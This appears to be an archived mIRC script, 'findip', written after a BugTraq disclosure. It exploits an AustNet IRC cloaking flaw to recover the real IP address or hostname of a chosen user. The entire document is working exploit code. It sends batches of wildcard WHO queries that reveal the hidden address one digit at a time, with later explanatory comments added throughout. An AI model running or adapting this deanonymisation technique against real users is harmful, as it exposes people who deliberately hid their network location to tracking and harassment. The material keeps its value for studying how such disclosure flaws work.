Findip.mrc is a mIRC script written in response to a BugTraq post about an AustNet vulnerability - findip determines the real host or IP of a given nick if either is cloaked behind an AustNet Virtual World account.
84435972fcbd6c9a22cc3a395fcf8e28a15a22e8160c53c8a2aa0d07d316330c
;findip v2.0 by joepeg (jo3) [Skank4ska@Rocketmail.com]
;040799
;
;findip determines the real host or IP of a given nick if either is cloaked behind
;an AustNet Virtual World account.
;
;Syntax: /findip [-h host_pattern] <nickname>
;
; -h - switch to let the script know you are scanning for a host rather than IP
; If the switch is not used, findip will, by default, attempt to determine the IP
; host_pattern - basic host pattern of nickname's real host.
; All number positions must be replaced with #'s
;
; example host: max-10-123.goulburn.net.au
; host pattern: max-##-###.goulburn.net.au
;
; To learn more about determining the host pattern: http://www.2600.org.au/austnet-hack.html
; nickname - IRC nickname of the user whose host/IP you are trying to determine
;
;NOTE: this script has very little error checking, but should be easy to understand with the Status window replies.
;
;You are welcome to distribute this source freely with appropriate credit to the author. (joepeg@EFnet - Skank4ska@Rocketmail.com)
;If you wish to alter it, please acknowledge the original author in its distribution, and email the new source to his address.
;
;For clarity, this script was derived completely from the information found at http://www.2600.org.au/austnet-hack.html.
;I have no AustNet experience, nor do I have any further knowledge (about AustNet, this exploit, or any of its components) than
;what is found at the above URL.
;
;Please send any comments or gripes to Skank4ska@Rocketmail.com
;Enjoy - .joepeg
;findip - entry point. Two forms, dispatched on $1:
;  /findip <nick>                 -> IP mode: /dns the nick, continue in the on 1:DNS handler
;  /findip -h <host_pattern> <nick> -> host mode: resolve the '#' placeholders of the pattern via findip3
;All state is kept in global %findip.* variables; they are wiped (unset %findip.*) at every start
;and at every success/failure exit, so only one scan can run at a time.
;Mechanism (inferred from the code, not stated on the page): WHO with a wildcard mask appears to be
;answered against the user's real host even though the displayed host is cloaked, so each probe is a
;one-digit yes/no oracle. The exposure exists only where a server evaluates masks that way — TODO confirm
;against the referenced write-up.
alias findip {
;no arguments at all: usage, then stop
if ($1 == $null) {
findiphelp
halt
}
if ($1 == -h) {
;host mode needs both a pattern ($2) and a nick ($3)
if ($3 == $null) {
findiphelp
halt
}
echo -a [findip]: Scanning for host...
unset %findip.*
;status on is the gate checked by the on DNS / raw 352 / raw 315 handlers
set %findip.status on
set %findip.host $2
set %findip.nick $3
;realcount = number of '#' ($chr(35)) placeholders that still have to be resolved
set %findip.realcount $count(%findip.host,$chr(35))
;tempcount = 1-based count of placeholders resolved so far (compared against realcount in raw 315)
set %findip.tempcount 1
;replycount = number of 315 (end of WHO) replies seen for the current batch of ten probes
set %findip.replycount 0
set %findip.findhost true
;pos = index of the first unresolved '#' in the pattern
set %findip.pos $pos(%findip.host,$chr(35),1)
findip3
}
else {
echo -a [findip]: Scanning for IP...
unset %findip.*
set %findip.status on
set %findip.nick $1
set %findip.replycount 0
;the lookup completes asynchronously; the result is picked up in on 1:DNS below
dns %findip.nick
}
}
;findip2 - IP-mode probe batch. Issues ten WHO queries, one per digit 0-9, each with the mask
;<%findip.ip><digit>* — e.g. (constructed) prefix "10.20." gives "10.20.0*" .. "10.20.9*".
;Every query is answered with a 315 (end of WHO); a 352 reply naming %findip.nick marks the digit
;that is correct (handled in raw 352 / raw 315). Written as a goto loop.
alias findip2 {
set %findip.num 0
:again
;$chr(42) is the '*' wildcard
who %findip.ip $+ %findip.num $+ $chr(42)
inc %findip.num
;after digit 9 the batch is complete; halt ends processing here and the reply events carry on
if (%findip.num > 9) {
halt
}
goto again
}
;findip3 - host-mode probe batch. For each digit 0-9, builds a candidate mask from the pattern by
;putting the digit in place of the first '#' (at %findip.pos) and turning every remaining '#' into
;the '*' wildcard, then issues WHO for it. Example (constructed): pattern "max-##-###.example.net"
;with pos 5 produces "max-0*-***.example.net" .. "max-9*-***.example.net".
;%findip.pos is maintained by findip and raw 315; this alias only reads it.
alias findip3 {
set %findip.num 0
:again
;hosttemp = text before the '#' (if any), the current digit, then the rest of the pattern after the '#'.
;The second branch covers a pattern that starts with '#', where nothing precedes the digit.
if (%findip.pos > 1) { set %findip.hosttemp $mid(%findip.host,1,$calc(%findip.pos - 1)) $+ %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
else { set %findip.hosttemp %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
;remaining '#' ($chr(35)) become '*' ($chr(42)) so the mask accepts any value there
who $replace(%findip.hosttemp,$chr(35),$chr(42))
inc %findip.num
;stop after digit 9; the matching digit (if any) is recorded by raw 315
if (%findip.num > 9) {
halt
}
goto again
}
;findiphelp - prints the usage text to the active window (echo -a).
;$chr(160) is a non-breaking space; presumably used to get a visually blank line, since an
;empty echo would print nothing.
alias findiphelp {
echo -a $chr(160)
echo -a Findip by jo3
echo -a -------------
echo -a Findip determines the real IP or hostname of the given nick
echo -a when cloaked by an AustNet's Virtual World account
echo -a usage:
echo -a /findip [-h hostname] <nickname>
echo -a $chr(160)
}
;on DNS - fires when the /dns issued by findip (IP mode) completes; ignored unless %findip.status is on.
;$iaddress is the resolved address. Only its first two octets are kept as the WHO mask prefix,
;e.g. (constructed) "10.20.30.40" -> "10.20."; the remaining octets are then recovered one digit
;at a time by findip2 / raw 315.
on 1:DNS: {
if (%findip.status == on) {
;nothing resolved: there is no prefix to start probing from, so clean up and stop
if ($iaddress == $null) {
echo -a [findip]: Unable to resolve cloaked IP. Stopping.
unset %findip.*
halt
}
;$gettok(...,1-2,46): tokens 1-2 split on '.' (ASCII 46); the trailing '.' is appended again
set %findip.ip $gettok($iaddress,1-2,46) $+ $chr(46)
findip2
}
}
;raw 352 (RPL_WHOREPLY) - one line per user matched by the current WHO mask; $6 is the nick field.
;A reply for %findip.nick means the mask most recently sent contains a correct digit.
;grabip tells the next 315 handler to record that mask; ipgrabbed tells the host-mode failure
;branch that this round succeeded; replycount is lowered by ten so the ten 315 replies of the
;batch evidently do not reach the "> 9" failure check in raw 315.
raw 352:*: {
if (%findip.status == on) {
if ($6 == %findip.nick) {
set %findip.grabip on
set %findip.ipgrabbed true
set %findip.replycount $calc(%findip.replycount - 10)
}
}
}
;raw 315 (RPL_ENDOFWHO) - closes every WHO probe; $2 is the mask echoed back by the server.
;Two roles: when raw 352 has set grabip, the echoed mask is the one that matched and its digit is
;fixed into %findip.host (host mode) or %findip.ip (IP mode) and the next probe batch is started;
;otherwise the handler only counts replies, and once all ten probes of a batch have ended without a
;match it reports failure. Every exit path clears %findip.*.
;Note: the guard only checks the nick match and does not verify that $2 is the mask of this scan
;(any other WHO completing meanwhile would be taken as a result) — TODO confirm.
raw 315:*: {
if (%findip.status == on) {
inc %findip.replycount
if (%findip.grabip == on) {
if (%findip.findhost == true) {
;keep the first pos characters of the echoed mask (which end with the matched digit) and
;append the untouched remainder of the pattern after the '#'
set %findip.host $mid($2,1,$calc(%findip.pos)) $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host))
set %findip.grabip off
inc %findip.tempcount
;all placeholders resolved?
if (%findip.tempcount > %findip.realcount) {
echo -a [findip]: Real Host Found! %findip.nick $+ @ $+ %findip.host
unset %findip.*
halt
}
;advance to the next '#' and probe it
set %findip.pos $pos(%findip.host,$chr(35),1)
findip3
}
else {
;IP mode: drop the trailing '*' of the echoed mask, leaving the confirmed prefix
set %findip.ip $left($2, $calc($len($2) - 1))
set %findip.grabip off
;two dots: working on the third octet. A partial octet of 1..25 may still take another digit
;(its evident reasoning: 26..99 cannot, since a third digit would exceed 255 — TODO confirm);
;otherwise the octet is taken as complete and a '.' is appended before probing the fourth.
if ($count(%findip.ip,$chr(46)) == 2) {
if ($gettok(%findip.ip,3,46) > 0 && $gettok(%findip.ip,3,46) < 26) { findip2 }
else {
set %findip.ip %findip.ip $+ $chr(46)
findip2
}
}
;three dots: working on the last octet; same 1..25 rule, and a complete octet means the address is found
if ($count(%findip.ip,$chr(46)) == 3) {
if ($gettok(%findip.ip,4,46) > 0 && $gettok(%findip.ip,4,46) < 26) { findip2 }
else {
echo -a [findip]: Real IP Found! %findip.nick $+ @ $+ %findip.ip
unset %findip.*
halt
}
}
}
}
else {
;no match recorded for this reply; once ten probes have ended, decide whether the batch failed
if (%findip.replycount > 9) {
if (%findip.findhost == true) {
;host mode: ipgrabbed is set by raw 352 when a digit matched in this round; absent it, give up
if (%findip.ipgrabbed != true) {
echo -a [findip]: Unable to determine real host. Stopping.
echo -a [findip]: You may wish to try an alternative host pattern if exists.
unset %findip.*
halt
}
else { unset %findip.ipgrabbed }
}
else {
;IP mode: none of the ten digits matched
echo -a [findip]: Unable to determine real IP. Stopping.
echo -a [findip]: You may have to scan for host.
unset %findip.*
halt
}
}
}
}
}